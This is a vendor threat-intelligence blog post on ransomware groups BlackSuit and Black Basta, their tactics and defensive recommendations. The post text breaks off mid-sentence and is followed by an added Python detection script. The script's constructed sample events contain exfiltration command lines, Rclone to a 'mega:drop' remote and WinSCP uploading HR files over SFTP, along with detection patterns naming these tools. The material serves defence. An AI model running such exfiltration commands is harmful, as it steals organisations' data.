Source |
AlienVault Lab Blog |
Identifier |
8623455 |
Publication date |
2024-12-11 12:00:00 (viewed: 2024-12-11 14:07:56) |
Title |
LevelBlue SOC Analysts See Sharp Rise in Cyber Threats: Stay Vigilant |
Text |
This holiday season our SOC analysts have observed a sharp uptick in cyber threat activity. Specifically, they have seen a rise in attempted ransomware attacks, which started during the American Thanksgiving week (beginning November 25, 2024) and are expected to continue throughout the holiday season. Below we share details on the threat actors involved and their tactics, along with recommendations to help you proactively strengthen your defenses against these evolving threats.
Key Threat Groups
BlackSuit (formerly "Royal")
Known for targeting critical infrastructure sectors, including healthcare, government, and manufacturing, BlackSuit exfiltrates data and extorts victims before encrypting systems, according to a Cybersecurity and Infrastructure Security Agency (CISA) advisory.
Common attack vectors and techniques include:
- Phishing emails and malicious websites
- Exploitation of internet-facing virtual private network (VPN) portals that do not enforce multi-factor authentication (MFA)
- Disabling antivirus software, then exfiltrating data before encrypting systems
Black Basta
Operating as ransomware-as-a-service (RaaS), Black Basta affiliates have impacted over 500 organizations across North America, Europe, and Australia, according to CISA. Key tactics:
- Vishing: impersonating help desk technicians by phone to talk users into granting access to their workstations
- Using remote management tools, delivered under the guise of IT support, to gain entry and escalate the attack
LevelBlue Observations of Threat Actor TTPs and How to Fortify Security
In recent weeks, our SOC team has observed threat actors using the following tactics to launch attacks. Each tactic is paired with our recommendations.

Tactic: Exploitation of a VPN portal that is not enforcing MFA to gain initial access
Recommendations:
- Enforce MFA for VPN connections and geo-fence your VPN portal(s)
- Patch VPN devices; historically we have observed these external-facing network appliances being compromised

Tactic: Vishing (impersonating a "help desk" team member) to gain initial access to an end-user workstation, which then gives the attacker a foothold into the larger network. Emails and text messages are also being used for credential collection and malware deployment. Two phone numbers LevelBlue has identified in incidents are 1-844-201-3441 and 304-718-2459.
Recommendations:
- Provide employees with training on vishing attacks and the common lures used
- Implement a verification process for both help desk staff and the employees they call during legitimate IT support scenarios
- Direct employees to report suspicious communications immediately to a supervisor and to security leadership

Tactic: Use of Rclone, WinSCP, and other file transfer tools to exfiltrate data from the environment
Recommendations:
- Block the installation and execution of common attacker tooling that has no designated function in your network; where such a tool is legitimately needed, allow it only under strictly enforced exceptions (specific hosts and accounts)

Tactic: Exploitation of vulnerabilities in common software and applications to escalate privileges. Vulnerabilities in VMware, Microsoft Exchange, Microsoft SharePoint, and other self-hosted applications are being particularly targeted to gain administrator or even root access within environments.
Recommendations:
- Patch software per vendor recommendations and review your organization's vulnerability |
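As an added example (not part of the LevelBlue post), the following Python script triages two of the tactics in the table above over constructed log data: successful VPN logins without MFA or from outside an assumed geo-fence, and Rclone/WinSCP execution in process-creation events, including the renamed-binary case that a block rule keyed on the file name alone would miss. The field names follow Sysmon Event ID 1 (ProcessCreate); the allowed countries, the approved backup host/account, the hostnames and every sample event are assumptions constructed for this example.

```python
"""Added example: triage two TTPs from the table above over constructed events.

Part 1 reviews VPN authentication logs for successful logins without MFA or from
outside the geo-fence. Part 2 hunts for Rclone/WinSCP execution in process-creation
events (field names follow Sysmon Event ID 1) and flags renamed binaries via
OriginalFileName. All sample data is constructed; the allow-lists are assumptions.
"""
import re

# ---------------------------------------------------------------- Part 1: VPN
ALLOWED_COUNTRIES = {"US", "CA"}          # assumption: where the org's users sit
MFA_TRUE = {"yes", "true", "1"}

def parse_kv(line):
    """Parse 'key=value key2=value2' log lines into a dict."""
    return dict(tok.split("=", 1) for tok in line.split() if "=" in tok)

def review_vpn_logins(lines):
    """Return (timestamp, user, src, reasons) for each risky successful login."""
    findings = []
    for line in lines:
        ev = parse_kv(line)
        if ev.get("result") != "success":
            continue                          # failures are noise for this check
        reasons = []
        if ev.get("mfa", "").lower() not in MFA_TRUE:
            reasons.append("no MFA")
        if ev.get("country") not in ALLOWED_COUNTRIES:
            reasons.append("outside geo-fence: %s" % ev.get("country"))
        if reasons:
            findings.append((ev.get("ts"), ev.get("user"), ev.get("src"), reasons))
    return findings

VPN_LOG = [  # constructed sample lines
    "ts=2024-11-28T02:14:07Z user=jdoe src=198.51.100.23 country=US mfa=yes result=success",
    "ts=2024-11-28T02:41:55Z user=asmith src=203.0.113.77 country=RO mfa=no result=success",
    "ts=2024-11-28T02:42:10Z user=asmith src=203.0.113.77 country=RO mfa=no result=failure",
    "ts=2024-11-28T03:05:31Z user=svc_vpn src=198.51.100.9 country=US mfa=no result=success",
]

# ---------------------------------------------------------- Part 2: exfil tools
# OriginalFileName comes from the PE version resource, so it survives renaming.
EXFIL_TOOLS = {"rclone.exe": "rclone", "winscp.exe": "WinSCP"}
# assumption: the one host/account allowed to run these (the "strictly enforced exception")
APPROVED = {("BACKUP01", "CORP\\svc_backup")}
RCLONE_XFER = re.compile(r"\b(copy|sync|move|copyto)\b", re.I)
REMOTE_URL = re.compile(r"\b(s?ftp|scp|webdav)://", re.I)

def detect_exfil_tools(events):
    """Return one finding per process-creation event that runs a known transfer tool."""
    findings = []
    for ev in events:
        image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        original = ev.get("OriginalFileName", "").lower()
        tool = EXFIL_TOOLS.get(original) or EXFIL_TOOLS.get(image)
        if tool is None or (ev.get("Computer"), ev.get("User")) in APPROVED:
            continue
        cmd = ev.get("CommandLine", "")
        notes = []
        if original in EXFIL_TOOLS and image != original:
            notes.append("renamed binary: %s is really %s" % (image, original))
        if tool == "rclone" and RCLONE_XFER.search(cmd):
            notes.append("rclone transfer command")
        if REMOTE_URL.search(cmd):
            notes.append("remote URL on command line")
        findings.append({"host": ev.get("Computer"), "user": ev.get("User"),
                         "tool": tool, "severity": "high" if notes else "medium",
                         "notes": notes})
    return findings

PROC_EVENTS = [  # constructed, Sysmon Event ID 1 style
    {"Computer": "BACKUP01", "User": "CORP\\svc_backup", "Image": "C:\\Tools\\rclone.exe",
     "OriginalFileName": "rclone.exe", "CommandLine": "rclone.exe sync D:\\bak s3:corp-backup"},
    {"Computer": "WS-0412", "User": "CORP\\asmith", "Image": "C:\\Users\\Public\\svchost.exe",
     "OriginalFileName": "rclone.exe",
     "CommandLine": "svchost.exe copy C:\\Finance mega:drop --transfers 16 -q"},
    {"Computer": "WS-0412", "User": "CORP\\asmith", "Image": "C:\\Temp\\WinSCP.exe",
     "OriginalFileName": "winscp.exe",
     "CommandLine": 'WinSCP.exe /command "open sftp://u:p@203.0.113.7/" "put C:\\HR\\*"'},
    {"Computer": "WS-0099", "User": "CORP\\jdoe", "Image": "C:\\Windows\\notepad.exe",
     "OriginalFileName": "NOTEPAD.EXE", "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for f in review_vpn_logins(VPN_LOG):
        print("VPN  ", f)
    for f in detect_exfil_tools(PROC_EVENTS):
        print("EXFIL", f)
```

The OriginalFileName check is the practical caveat behind the "block attacker tools" recommendation: attackers routinely drop rclone.exe under an innocuous name, so a block rule or detection keyed on the file name alone is bypassed. Key AppLocker/WDAC rules on publisher or hash, and key detections on the PE's original file name, rather than on the path or name on disk.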
Tags |
Ransomware
Malware
Tool
Vulnerability
Threat
Patching
Medical
Cloud
|